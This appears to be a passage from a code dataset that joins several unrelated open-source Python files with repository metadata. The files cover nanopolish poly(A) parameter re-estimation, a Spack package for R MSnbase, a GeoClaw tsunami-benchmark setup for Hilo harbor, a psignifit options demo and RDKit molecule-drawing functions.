print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_L_llh, new_L_llh))
old_A_llh = np.mean(old_data['A_loglkhd'])
new_A_llh0 = new_pi0_A * norm.pdf(new_data['A_samples'], loc=new_mu0_A, scale=np.sqrt(new_sig0_A))
new_A_llh1 = new_pi1_A * norm.pdf(new_data['A_samples'], loc=new_mu1_A, scale=np.sqrt(new_sig1_A))
new_A_llh = np.mean(np.log(new_A_llh0 + new_A_llh1))
print("> Average ADAPTER log-probs:")
print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_A_llh, new_A_llh))
old_P_llh = np.mean(old_data['P_loglkhd'])
new_P_llh = np.mean(norm.logpdf(new_data['P_samples'], loc=new_mu_P, scale=np.sqrt(new_sigma_P)))
print("> Average POLYA log-probs:")
print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_P_llh, new_P_llh))
old_T_llh = np.mean(old_data['T_loglkhd'])
new_T_llh0 = new_pi0_T * norm.pdf(new_data['T_samples'], loc=new_mu0_T, scale=np.sqrt(new_sig0_T))
new_T_llh1 = new_pi1_T * norm.pdf(new_data['T_samples'], loc=new_mu1_T, scale=np.sqrt(new_sig1_T))
new_T_llh = np.mean(np.log(new_T_llh0 + new_T_llh1))
print("> Average TRANSCRIPT log-probs:")
print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_T_llh, new_T_llh))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Infer new Poly(A) emission parameters.")
parser.add_argument("old_samples_tsv", help="Path to TSV file of old samples.")
parser.add_argument("segmentation_tsv", help="Path to segmentations for reads.")
parser.add_argument("new_samples_tsv", help="Path to TSV file of new samples.")
parser.add_argument("--benchmark", default=True, type=bool, dest="benchmark",
help="If `--benchmark=False`, don't the new estimated HMM parameters.")
args = parser.parse_args()
# sanity checks:
assert os.path.exists(args.old_samples_tsv)
assert os.path.exists(args.segmentation_tsv)
assert os.path.exists(args.new_samples_tsv)
# run inference and (optional) benchmarking of new parameters:
main(args.old_samples_tsv, args.segmentation_tsv, args.new_samples_tsv, benchmark=args.benchmark)
| jts/nanopolish | scripts/reestimate_polya_emissions.py | Python | mit | 13,740 | [
"Gaussian"
] | 7b656364ccb05d5fcb02a4d23199ffcc07713304a3f6fc1b5f335ba49331e57f |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RMsnbase(RPackage):
"""Manipulation, processing and visualisation of mass spectrometry and
proteomics data."""
homepage = "https://www.bioconductor.org/packages/MSnbase/"
git = "https://git.bioconductor.org/packages/MSnbase.git"
version('2.2.0', commit='d6e8fb7f106d05096fa9074da0f829ac8f02c197')
depends_on('r-biocgenerics', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-mzr', type=('build', 'run'))
depends_on('r-biocparallel', type=('build', 'run'))
depends_on('r-protgenerics', type=('build', 'run'))
depends_on('r-plyr', type=('build', 'run'))
depends_on('r-iranges', type=('build', 'run'))
depends_on('r-preprocesscore', type=('build', 'run'))
depends_on('r-vsn', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-impute', type=('build', 'run'))
depends_on('r-pcamethods', type=('build', 'run'))
depends_on('r-mzid', type=('build', 'run'))
depends_on('r-maldiquant', type=('build', 'run'))
depends_on('r-digest', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-s4vectors', type=('build', 'run'))
depends_on('r-xml', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@2.2.0')
| mfherbst/spack | var/spack/repos/builtin/packages/r-msnbase/package.py | Python | lgpl-2.1 | 2,662 | [
"Bioconductor"
] | b2eb4196704ee5c680465d5bfe7e1a7837d6769a7253ea085839a0b3d0c42297 |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# Problem-specific parameters to be written to setprob.data:
#------------------------------------------------------------------
#probdata = rundata.new_UserData(name='probdata',fname='setprob.data')
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = 204.905 # xlower
clawdata.upper[0] = 204.965 # xupper
clawdata.lower[1] = 19.71 # ylower
clawdata.upper[1] = 19.758 # yupper
# Number of grid cells:
clawdata.num_cells[0] = 108 # 2-sec # mx
clawdata.num_cells[1] = 88 # my
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 3
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00006' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
clawdata.output_style = 1
if clawdata.output_style==1:
# Output ntimes frames at equally spaced times up to tfinal:
# Can specify num_output_times = 0 for no output
clawdata.num_output_times = 14
clawdata.tfinal = 7*3600.
clawdata.output_t0 = True # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list or numpy array of output times:
# Include t0 if you want output at the initial time.
clawdata.output_times = 3600. * np.linspace(1,4,97)
elif clawdata.output_style == 3:
# Output every step_interval timesteps over total_steps timesteps:
clawdata.output_step_interval = 1
clawdata.total_steps = 10
clawdata.output_t0 = False # output at initial (or restart) time?
clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
clawdata.output_q_components = 'all' # could be list such as [True,True]
clawdata.output_aux_components = 'none' # could be list
clawdata.output_aux_onlyonce = True # output aux arrays only at t0
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 0
# --------------
# Time stepping:
# --------------
# if dt_variable==True: variable time steps used based on cfl_desired,
# if dt_variable==Falseixed time steps dt = dt_initial always used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# (If dt_variable==0 then dt=dt_initial for all steps)
clawdata.dt_initial = 0.016
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used
clawdata.cfl_desired = 0.75
# max Courant number to allow without retaking step with a smaller dt:
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 50000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'vanleer' ==> van Leer
# 4 or 'mc' ==> MC limiter
clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 1
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 or 'user' => user specified (must modify bcNamr.f to use this option)
# 1 or 'extrap' => extrapolation (non-reflecting outflow)
# 2 or 'periodic' => periodic (must specify this at both boundaries)
# 3 or 'wall' => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap' # at xlower
clawdata.bc_upper[0] = 'extrap' # at xupper
clawdata.bc_lower[1] = 'extrap' # at ylower
clawdata.bc_upper[1] = 'user' # at yupper
# ---------------
# Gauges:
# ---------------
gauges = rundata.gaugedata.gauges
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
gauges.append([1125, 204.91802, 19.74517, 0., 1.e9]) #Hilo
gauges.append([1126, 204.93003, 19.74167, 0., 1.e9]) #Hilo
# gauges.append([11261, 204.93003, 19.739, 0., 1.e9])
# #Hilo
# Tide gauge:
gauges.append([7760, 204.9437, 19.7306, 0., 1.e9]) # Hilo
gauges.append([7761, 204.9447, 19.7308, 0., 1.e9]) # From Benchmark descr.
gauges.append([7762, 204.9437, 19.7307, 0., 1.e9]) # Shift so depth > 0
# Gauge at point requested by Pat Lynett:
gauges.append([3333, 204.93, 19.7576, 0., 1.e9])
if 0:
# Array of synthetic gauges originally used to find S2 location:
dx = .0005
for i in range(6):
x = 204.93003 - i*dx
for j in range(5):
y = 19.74167 + (j-2)*dx
gauges.append([10*(j+1)+i+1, x, y, 0., 1.e9])
# --------------
# Checkpointing:
# --------------
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 0
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = np.array([7.5,8,8.5,9,9.5]) * 3600.
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters: (written to amr.data)
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 3
# List of refinement ratios at each level (length at least amr_level_max-1)
amrdata.refinement_ratios_x = [2,3]
amrdata.refinement_ratios_y = [2,3]
amrdata.refinement_ratios_t = [2,3]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length num_aux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center', 'capacity', 'yleft']
# Flag for refinement based on Richardson error estimater:
amrdata.flag_richardson = False # use Richardson?
amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
# Flag for refinement using routine flag2refine:
amrdata.flag2refine = True # use this?
amrdata.flag2refine_tol = 0.5 # tolerance used in this routine
# Note: in geoclaw the refinement tolerance is set as wave_tolerance below
# and flag2refine_tol is unused!
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.7
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ---------------
# Regions:
# ---------------
regions = rundata.regiondata.regions
regions.append([1, 1, 0., 1e9, 0, 360, -90, 90])
regions.append([1, 2, 0., 1e9, 204.9, 204.95, 19.7, 19.754])
regions.append([1, 3, 0., 1e9, 204.9, 204.95, 19.7, 19.751])
regions.append([1, 4, 0., 1e9, 204.9, 204.95, 19.72, 19.748])
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = False # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367500.0
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
geo_data.sea_level = 0.
geo_data.dry_tolerance = 0.001
geo_data.friction_forcing = True
geo_data.manning_coefficient = 0.025
geo_data.friction_depth = 500.0
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.02
refinement_data.deep_depth = 200.0
refinement_data.max_level_deep = 4
# == settopo.data values ==
topofiles = rundata.topo_data.topofiles
topodir = '../'
topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'hilo_flattened.tt2'])
topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'flat.tt2'])
# == setdtopo.data values ==
#rundata.dtopo_data.dtopofiles = [[1, 3, 3, topodir + 'Fujii.txydz']]
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
# == fixedgrids.data values ==
rundata.fixed_grid_data.fixedgrids = []
fixedgrids = rundata.fixed_grid_data.fixedgrids
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
# for fixed grids append to this list names of any fgmax input files
fgmax_files.append('fgmax_grid.txt')
rundata.fgmax_data.num_fgmax_val = 2
return rundata
# end of function setgeo
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
from clawpack.geoclaw import kmltools
kmltools.regions2kml()
kmltools.gauges2kml()
| xinshengqin/tsunami_benchmarks | nthmp_currents_2015/problem2/harbor1/setrun.py | Python | bsd-3-clause | 14,360 | [
"NetCDF"
] | 0184c75151e25413929aa01cad8c24c38c137af14d6b29867e3d38680c20423c |
# -*- coding: utf-8 -*-
"""
DEMO_002 OPTION DICTIONARY
Which options can one set?
This demo explains all fields of the options dictionary, e.g. which options
you can set for the fitting process as a user.
"""
from numpy import array, exp
from psignifit.psignifit import psignifit
# to have some data we use the data from demo_001
data = array([[0.0010, 45.0000, 90.0000],
[0.0015, 50.0000, 90.0000],
[0.0020, 44.0000, 90.0000],
[0.0025, 44.0000, 90.0000],
[0.0030, 52.0000, 90.0000],
[0.0035, 53.0000, 90.0000],
[0.0040, 62.0000, 90.0000],
[0.0045, 64.0000, 90.0000],
[0.0050, 76.0000, 90.0000],
[0.0060, 79.0000, 90.0000],
[0.0070, 88.0000, 90.0000],
[0.0080, 90.0000, 90.0000],
[0.0100, 90.0000, 90.0000]])
# initializing options dictionary
options = dict()
# now or at any later time you can run a fit with this command.
res=psignifit(data,options)
""" list of options fields """
''' Here we list all fields of the option dictionary which can be accessed by
options['fieldname'] = default Value
afterwards follows some explanation and allowed values '''
""" options['sigmoidName'] = 'norm' """
''' This sets the type of sigmoid you fit to your data. '''
#The dafault value 'norm' fits a cumulative gaussian to your data.
options['sigmoidName'] = 'norm'
#another standard alternative is the logistic function
options['sigmoidName'] = 'logistic'
# For data on a logscale you may want to fit a log-normal distribution or a
# Weibull which you invoce with:
options['sigmoidName'] = 'logn'
# or
options['sigmoidName'] = 'weibull'
# We also included the gumbel and reversed gumbel functions for asymmetric
# psychometric functions. The gumbel has a longer lower tail the reversed
# gumbel a longer upper tail.
options['sigmoidName'] = 'gumbel'
# or
options['sigmoidName'] = 'rgumbel'
# for a heavy tailed distribution use
options['sigmoidName'] = 'tdist'
""" options['sigmoidHandle'] """
''' Here you may provide a handle to your own sigmoid which takes two
parameters as input and hands back a function value. This should be
vectorized or even a formula.
However, this is usually obtained from options['sigmoidName']
This is needed if you want to use your own sigmoid, which is not built in '''
""" options['expType'] = 'YesNo' """
''' This sets which parameters you want to be free and which you fix and to
which values, for standard experiment types. '''
# 'YesNo', default sets all parameters free, which is suitable for a standard
# yes/no paradigm.
options['expType'] = 'YesNo'
# '2AFC', fixes the lower asymptote to .5 and fits the rest, for 2
# alternative forced choice experiments.
options['expType'] = '2AFC'
# 'nAFC', fixes the lower asymptote to 1/n and fits the rest. For this type
# of experiment you MUST also provide options['expN'] the number of
# alternatives.
# As an example with 3 alternatives:
options['expType'] = 'nAFC'
options['expN'] = 3
""" options['estimateType'] = 'mean' """
''' How you want to estimate your fit from the posterior '''
# 'MAP' The MAP estimator is the maximum a posteriori computed from
# the posterior.
options['estimateType'] = 'MAP'
# 'mean' The posterior mean. In a Bayesian sence a more suitable estimate.
# the expected value of the Posterior.
options['estimateType'] = 'mean'
""" options['stepN'] = [40,40,20,20,20]
options['mbStepN'] = [25,20,10,10,20] """
''' This sets the number of grid points on each dimension in the final
fitting (stepN) and in the moving of borders mbStepN
the order is
[threshold,width,upper asymptote,lower asymptote,variance scaling]
You may change this if you need more accurate estimates on the sparsely
sampled parameters or if you want to play with them to save time '''
# for example to get an even more exact estimate on the
# lapse rate/upper asymptote plug in
options['stepN']=[40,40,50,20,20]
# now the lapse rate is sampled at 50 places giving you a much more exact
# and smooth curve for comparisons.
""" options['confP'] = .95 """
''' The confidence level for the computed confidence intervals.
This may be set to any number between 0 and 1 excluding. '''
# for example to get 99% confidence intervals try
options['confP'] = .99
# You may specify a vector as well. If you do the conf_intervals in the
# result will be a 5x2xN array containing the values for the different
# confidence levels in the 3rd dimension.
options['confP'] = [.95,.9,.68,.5]
# will return 4 confidence intervals for each parameter for example.
""" options['threshPC'] = .5 """
''' Which percent correct correspond to the threshold?
Given in Percent correct on the unscaled sigmoid (reaching from 0 to 1). '''
# For example to define the threshold as 90% correct try:
options['threshPC'] = .9
""" options['CImethod'] ='stripes' """
''' This sets how the confidence intervals are computed in getConfRegion
possible variants are:
'project' -> project the confidence region on each axis
'stripes' -> find a threshold with (1-alpha) above it
This will disregard intervals of low posterior probability and then move
in from the sides to adjust the exact CI size.
This can handle borders and asymmetric distributions slightly better, but
will introduce slight jumps of the confidence interval when confp is
adjusted depending on when the gridpoints get too small posterior
probability.
'percentiles' -> find alpha/2 and 1-alpha/2 percentiles
(alpha = 1-confP)
cuts at the estimated percentiles-> always tries to place alpha/2
posterior probability above and below the credible interval.
This has no jumping but will exclude border values even when they have
the highest posterior. Additionally it will not choose the area of
highest posterior density if the distribution is skewed. '''
""" options['priors'] = getStandardPriors() """
''' This field contains a cell array of function handles, which define the
priors for each parameter.
If you want to set your priors manually, here is the place for it.
For details on how do change these refer to
https://github.com/wichmann-lab/psignifit/wiki/Priors '''
#TODO change to the Python repo
""" options['betaPrior'] = 20 """
''' this sets the strength of the Prior in favor of a binomial observer.
Larger values correspond to a stronger prior. We choose this value after
a rather large number of simulations. Refer to the paper to learn more
about this '''
""" options['nblocks'] = inf """
""" options['poolMaxGap'] = inf """
""" options['poolMaxLength'] = 50 """
""" options['poolxTol'] = 0 """
''' these options set how your data is pooled into blocks. Your data is only
pooled if your data Matrix has more than nblocks lines. Then we pool
together a maximum of poolMaxLength trials, which are separated by a
maximum of poolMaxGap trials of other stimulus levels. If you want you may
specify a tolerance in stimulus level to pool trials, but by default we
only pool trials with exactly the same stimulus level. '''
""" options['instantPlot'] = 0 """
''' A boolean to control whether you immediately get 2 standard plots of your
fit. Turn to 1 to see the effect. '''
options['instantPlot'] = 1
""" options['borders'] """
''' In this field you may provide your own bounds for the parameters.
This should be a 5x2 matrix of start and end of the range for the 5
parameters. (threshold,width,upper asymptote,lower asymptote,variance
scale) '''
#For example this would set the borders to
# threshold between 1 and 2
# width between .1 and 5
# a fixed lapse rate of .05
# a fixed lower asymptote at .05
# a maximum on the variance scale of .2
options['borders']= [ 1,2, .1,5,.05,.05, .5,.5, exp(-20),.2]
''' NOTE: By this you artificially exclude all values out of this range. Only
exclude parameter values, which are truely impossible!'''
""" options['setBordersType'] = 0 """
''' The method to set the outer borders of the grid. You find it's use in
setBorders
defaults to reasonable estimates for the threshold and width parameter: '''
options['setBordersType'] = 0
# To set the borders for arbitrary parameterizations change to
options['setBordersType'] = 1
#But also see demo_003 on how to implement other parameterizations as all
# build in functions are parameterized by threshold and width
""" options['maxBorderValue'] = exp(-10) """
''' Parts of the grid which produce marginal values below this are considered
0 and are excluded from the calculation in moveBorders.m
it should be a very small value and at least smaller than 1/(max(stepN)) '''
# This for example would exclude fewer values and more conservative
# movement of the borders:
options['maxBorderValue'] = exp(-20)
""" options.moveBorders = 1 """
''' Toggles the movement of borders by moveBorders
Usually this is good to concentrate on the right area in the parameter
space. '''
options['moveBorders'] = 1
# If you set
options['moveBorders'] = 0
# your posterior will always use the initial setting for the borders.
# This is usefull if you set the borders by hand and do not want
# psignifit to move them after this.
""" options['dynamicGrid'] = 0 """
''' Toggles the useage of a dynamic/adaptive grid.
there was hope for a more exact estimate by this, but although the curves
look smoother the confidence intervals were not more exact. Thus this is
deactivated by default. '''
options['dynamicGrid'] = 1
options['dynamicGrid'] = 0
# How many Likelihood evaluations are done per dimension to set the
# adaptive grid. Should be a relatively large number.
options['GridSetEval'] = 10000
# Only used with dynamic grid,--> by default not at all
''' options['UniformWeight'] = 0.5000
How many times the average is added to each position while setting the
adaptive grid. You may increase this number to get a more equally sampled
grid or decrease it to get an even stronger focus of the sampling on the
peak.
When you increase this value very much try to set options['dynamicGrid'] = 0
which produces an equal stepsize grid right away. '''
# As an example: Will produce a more focused grid which leaves the borders
# very weakly sampled.
options['UniformWeight'] = 0.01000
# Only used with dynamic grid,-> by default not at all
""" options['widthalpha'] = .05 """
''' This changes how the width of a psychometric function is defined
width= psi^(-1)(1-alpha) - psi^(-1)(alpha)
where psi^(-1) is the inverse of the sigmoid function.
widthalpha must be between 0 and .5 excluding '''
# Thus this would enable the useage of the interval from .1 to .9 as the
# width for example:
options['widthalpha'] = .1
""" options.logspace: = 0 """
''' this is triggered when you fit lognormal or Weibull functions, which are
fitted in logspace. This is an internal variable which is used to pass
this to all functions. It is of no interest for a user. '''
| Visdoom/psignifit-4.0 | demo_002.py | Python | gpl-3.0 | 11,305 | [
"Gaussian"
] | d2b5dcb62e069cf9df83c993f949592979d24d00d2d8fa8596252526bde7ca0c |
# $Id$
#
# Copyright (C) 2006-2011 Greg Landrum
# All Rights Reserved
#
import os
def _getCanvas():
useAGG=False
useCairo=False
Canvas=None
if not os.environ.get('RDKIT_CANVAS',''):
try:
from cairoCanvas import Canvas
useCairo=True
except ImportError:
try:
from aggCanvas import Canvas
useAGG=True
except ImportError:
from spingCanvas import Canvas
else:
canv=os.environ['RDKIT_CANVAS'].lower()
if canv =='cairo':
from cairoCanvas import Canvas
useCairo=True
elif canv =='agg':
from aggCanvas import Canvas
useAGG=True
else:
from spingCanvas import Canvas
return useAGG,useCairo,Canvas
def _createCanvas(size):
useAGG,useCairo,Canvas=_getCanvas()
if useAGG or useCairo:
import Image
img = Image.new("RGBA",size,"white")
canvas = Canvas(img)
else:
MolDrawing.radicalSymbol='.' #<- the sping canvas doesn't support unicode well
from spingCanvas import Canvas
canvas = Canvas(size=size,name='MolToImageFile')
img = canvas._image
return img,canvas
def MolToImage(mol, size=(300,300), kekulize=True, wedgeBonds=True,
**kwargs):
""" returns a PIL image containing a drawing of the molecule
Keyword arguments:
kekulize -- run kekulization routine on input `mol` (default True)
size -- final image size, in pixel (default (300,300))
wedgeBonds -- draw wedge (stereo) bonds (default True)
highlightAtoms -- list of atoms to highlight (default [])
highlightMap -- dictionary of (atom, color) pairs (default None)
highlightBonds -- list of bonds to highlight (default [])
"""
from MolDrawing import MolDrawing
if not mol:
raise ValueError,'Null molecule provided'
img,canvas=_createCanvas(size)
drawer = MolDrawing(canvas)
if kekulize:
from rdkit import Chem
mol = Chem.Mol(mol.ToBinary())
Chem.Kekulize(mol)
if not mol.GetNumConformers():
from rdkit.Chem import AllChem
AllChem.Compute2DCoords(mol)
drawer.wedgeDashedBonds=wedgeBonds
if kwargs.has_key('legend'):
legend = kwargs['legend']
del kwargs['legend']
else:
legend=''
drawer.AddMol(mol,**kwargs)
if legend:
from rdkit.Chem.Draw.MolDrawing import Font
bbox = drawer.boundingBoxes[mol]
pos = size[0]/2,int(.94*size[1]) # the 0.94 is extremely empirical
# canvas.addCanvasPolygon(((bbox[0],bbox[1]),(bbox[2],bbox[1]),(bbox[2],bbox[3]),(bbox[0],bbox[3])),
# color=(1,0,0),fill=False,stroke=True)
# canvas.addCanvasPolygon(((0,0),(0,size[1]),(size[0],size[1]),(size[0],0) ),
# color=(0,0,1),fill=False,stroke=True)
font=Font(face='sans',size=12)
canvas.addCanvasText(legend,pos,font)
if kwargs.get('returnCanvas',False):
return img,canvas,drawer
else:
canvas.flush()
return img
def MolToFile(mol,fileName,size=(300,300),kekulize=True, wedgeBonds=True,
imageType=None,**kwargs):
""" Generates a drawing of a molecule and writes it to a file
"""
from MolDrawing import MolDrawing
# original contribution from Uwe Hoffmann
if not fileName:
raise ValueError,'no fileName provided'
if not mol:
raise ValueError,'Null molecule provided'
if imageType is None:
imageType=os.path.splitext(fileName)[1][1:]
useAGG,useCairo,Canvas = _getCanvas()
if useCairo or useAGG:
canvas = Canvas(size=size,imageType=imageType,
fileName=fileName)
else:
MolDrawing.radicalSymbol='.' #<- the sping canvas doesn't support unicode well
canvas = Canvas(size=size,name=fileName,imageType=imageType)
drawer = MolDrawing(canvas)
if kekulize:
from rdkit import Chem
mol = Chem.Mol(mol.ToBinary())
Chem.Kekulize(mol)
if not mol.GetNumConformers():
from rdkit.Chem import AllChem
AllChem.Compute2DCoords(mol)
drawer.wedgeDashedBonds=wedgeBonds
drawer.AddMol(mol,**kwargs)
if useCairo or useAGG:
canvas.flush()
else:
canvas.save()
def MolToImageFile(mol,filename,size=(300,300),kekulize=True, wedgeBonds=True,
**kwargs):
""" DEPRECATED: please use MolToFile instead
"""
img = MolToImage(mol,size=size,kekulize=kekulize,wedgeBonds=wedgeBonds,**kwargs)
img.save(filename)
tkRoot=None
tkLabel=None
tkPI=None
def ShowMol(mol,size=(300,300),kekulize=True,wedgeBonds=True,
title='RDKit Molecule',**kwargs):
""" Generates a picture of a molecule and displays it in a Tkinter window
"""
global tkRoot,tkLabel,tkPI
import Tkinter
import ImageTk
img = MolToImage(mol,size,kekulize,wedgeBonds,**kwargs)
if not tkRoot:
tkRoot = Tkinter.Tk()
tkRoot.title(title)
tkPI = ImageTk.PhotoImage(img)
tkLabel = Tkinter.Label(tkRoot,image=tkPI)
tkLabel.place(x=0,y=0,width=img.size[0],height=img.size[1])
else:
tkPI.paste(img)
tkRoot.geometry('%dx%d'%(img.size))
def MolToMPL(mol,size=(300,300),kekulize=True, wedgeBonds=True,
imageType=None,**kwargs):
""" Generates a drawing of a molecule on a matplotlib canvas
"""
if not mol:
raise ValueError,'Null molecule provided'
from MolDrawing import MolDrawing
from mplCanvas import Canvas
canvas = Canvas(size)
drawer = MolDrawing(canvas)
omol=mol
if kekulize:
from rdkit import Chem
mol = Chem.Mol(mol.ToBinary())
Chem.Kekulize(mol)
if not mol.GetNumConformers():
from rdkit.Chem import AllChem
AllChem.Compute2DCoords(mol)
drawer.wedgeDashedBonds=wedgeBonds
drawer.AddMol(mol,**kwargs)
omol._atomPs=drawer.atomPs[mol]
for k,v in omol._atomPs.iteritems():
omol._atomPs[k]=canvas.rescalePt(v)
canvas._figure.set_size_inches(float(size[0])/100,float(size[1])/100)
return canvas._figure
def calcAtomGaussians(mol,a=0.03,step=0.02,weights=None):
"""
useful things to do with these:
fig.axes[0].imshow(z,cmap=cm.gray,interpolation='bilinear',origin='lower',extent=(0,1,0,1))
fig.axes[0].contour(x,y,z,20,colors='k')
fig=Draw.MolToMPL(m);
contribs=Crippen.rdMolDescriptors._CalcCrippenContribs(m)
logps,mrs=zip(*contribs)
x,y,z=Draw.calcAtomGaussians(m,0.03,step=0.01,weights=logps)
fig.axes[0].imshow(z,cmap=cm.jet,interpolation='bilinear',origin='lower',extent=(0,1,0,1))
fig.axes[0].contour(x,y,z,20,colors='k',alpha=0.5)
